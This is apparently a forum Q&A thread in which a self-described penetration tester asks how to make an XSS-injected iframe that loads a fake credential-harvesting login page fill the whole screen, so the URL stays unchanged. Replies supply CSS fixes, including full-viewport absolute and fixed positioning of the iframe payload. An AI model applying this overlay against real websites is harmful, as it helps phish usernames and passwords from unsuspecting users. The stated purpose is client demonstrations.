I'm currently looking into XSS attacks, with the aim of using them in client demonstrations (I'm a pen tester). I've written a tool that will host a malicious version of a website's login page (that harvests usernames and passwords) and then redirects the victim back to the original website. However, I have been trying to get it to work using iframes instead, as it would look far more convincing as the url won't change.
I've googled about and this seems to be the appropriate code:
<iframe src="http://192.168.0.1/login.php" style="border: 0; width: 100%; height: 100%">
but the iframe created is by no means full screen (on internet explorer and firefox). Here is a screenshot
As you can see, the iframe login page is beneath the "what is your name?" area, thus no where near full screen. I've tried editing the css file of the malicious login page, to include full screen parameters, but this has no effect either.
Does anyone have any solutions? Thanks!
You can add allowfullscreen attribute to the iframe so that you can click fullscreen button in the HTML5 player toolbar to go fullscreen.
Edit the width attribute. You should see the attribute "width=" after the URL in the iframe tag. Edit the width in pixels in quotations (" ") after the "width=" attribute. For example, if you want the width to be 300 pixels, you would enter "width="300px"" after the URL in the tag.
To get the iframe to properly use 100% the parent needs to be 100%. In newer doctypes the html and body tag are not automatically 100%. When I added height:100% for html and body then it worked flawlessly.
Not tested, but try this:
<iframe src="http://192.168.0.1/login.php" style="border: 0; position:absolute; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
or
<iframe src="http://192.168.0.1/login.php" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With